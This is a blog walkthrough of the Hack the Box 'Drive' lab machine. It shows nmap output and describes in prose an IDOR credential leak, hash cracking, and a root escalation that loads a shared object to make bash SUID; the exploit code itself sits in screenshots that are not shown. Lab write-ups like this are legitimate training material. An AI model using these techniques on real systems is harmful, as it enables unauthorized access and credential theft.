In this post, I would like to share a walkthrough of the Drive Machine from Hack the Box
This room will be considered a Hard machine on Hack the Box
What will you gain from the Drive machine?
For the user flag, you will need to exploit an IDOR vulnerability that allows me to gain unauthorized access to the administrator’s files and extract certain credentials, granting SSH access. Utilizing this access, I’ll infiltrate a Gitea instance and employ the extracted credentials to gain entry to a backup script and uncover passwords used for site backups. Within these backups, I’ll encounter hashes for additional users, which I’ll decrypt to obtain their passwords.
As for the root flag, you need to exploit the command-line client binary vulnerable to buffer overflow. I will demonstrate this vulnerability, along with two methods to achieve Remote Code Execution (RCE) through an unintended SQL injection
For those who want to learn or improve CyberSecurity skills especially Red Teaming and Blue Team, You can use the link https://affiliate.hackthebox.com/gnfp67dzy7p0 to support me
Academy link can be found https://affiliate.hackthebox.com/wanmohdariffwanmohdrosdi6259Information Gathering on Drive Machine
Once we have started the VPN connection which requires a download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN
[darknite@parrot]─[~/Documents/htb/drive]
└──╼ $nmap -sC -sV 10.10.11.235 -oA initial
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-16 05:48 EST
Nmap scan report for 10.10.11.235
Host is up (0.020s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 275a9fdb91c316e57da60d6dcb6bbd4a (RSA)
| 256 9d076bc847280df29f81f2b8c3a67853 (ECDSA)
|_ 256 1d30349f797369bdf667f3343c1ff94e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://drive.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
3000/tcp filtered ppp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.42 seconds
┌─[darknite@parrot]─[~/Documents/htb/drive]
└──╼ $
Let’s access the website interface.
There is nothing has been found interesting except for the login and register button
We also didn’t find any useful information via Burpsuite on the main page.
As a result, let’s try to register a new account so that we can investigate further
We successfully accessed the dashboard when we entered the credentials that we created earlier.
The output via burpsuite will look something as shown in the screenshot above.
The interface will appear as shown in the screenshot above when we click the dashboard button on the main page.
From what i noticed on the page, we can play around the functions such as “Change Properties”, “Delete”, “Edit Content” and “Just View”
It looks like something as shown above when we click the “Just View” Function.
IDOR vulnerability on the Drive machine
We should inspect the packet when we try to click one of the files found inside the dashboard page.
Enumerate by using the wfuzz tool
We can retrieve a few payloads after we execute the command that is shown above. The output of the payload will be “79”, “98”, “99”, “101” and “100”
Enumerate using burpsuite intruder
We can brute-forcing the ID that can be used to look into another account.
Let’s access the first id that shows in the burpsuite intruder output which is “79”. Surprisingly, we have retrieved some potential usernames and passwords to access the server.
However, the credentials that we found earlier cannot be used to access the login page.
However, we managed to access the machine with the credentials that we found earlier via SSH service.
We only found the snap directory which nothing stored in the directory
Investigate the SQLite Database
We found a few files that indicated to SQLite database. Therefore, let’s download one file db.sqlite3 into our machine.
There are a lot of sqlite syntax when we execute the dump command.
Let’s look at what is stored in the table column.
We managed to find a few pieces of information including hashes.
We have successfully some credentials when we try to crack the hashes by using hashcat.
After trying a few credentials, we have successfully accessed the machine as tom via SSH service.
We can read the user flag by using the “cat user.txt” command
Escalate to Root Privileges Access
When trying to read the user flag, i noticed there’s a file called “doodleGrive-cli” that assigned as binary file
Therefore, let’s download the binary file into our machine
We can analyze the binary file within the Ghidra tool and manage to see a username and password for the binary file
We also can find the username and password by using the “strings” command
As a result, we can create a file named exploit which contains the command permitting/bin/bash
Therefore, we can enter the username and password when executing the binary and choose the number 5 which activates the user account.
At last, the bash file has been assigned as a binary file which we can use to escalate to the root
We can read the root flag by typing the “cat root.txt” command
Another method to obtain root access
The source code that we use here is shown in the screenshot above.
We need to rename dark.so as 0.so and permit to execute. Once that happens, we can execute the doodleGrive-cli binary
As a result, we can run some syntax that is used to load the char function on the binary file
After a while, the bash file also change to binary file
We can read the root flag by typing the “cat root.txt” command
No responses yet